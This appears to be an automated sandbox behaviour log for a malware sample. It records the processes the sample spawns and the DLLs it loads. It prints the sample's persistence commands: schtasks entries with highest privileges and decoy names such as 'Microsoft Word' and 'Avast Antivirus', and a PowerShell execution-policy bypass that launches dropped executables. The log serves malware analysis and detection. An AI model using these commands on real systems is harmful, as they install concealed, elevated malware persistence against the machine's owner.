Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe" Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: netfxperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: esentprf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfts.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: utildll.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msdtcuiu.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: atl.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msdtcprx.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mtxclu.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: clusapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: resutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msscntrs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfdisk.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfnet.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: browcli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfos.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfproc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sysmain.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasctrs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: tapiperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfctrs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: usbperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: tquery.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
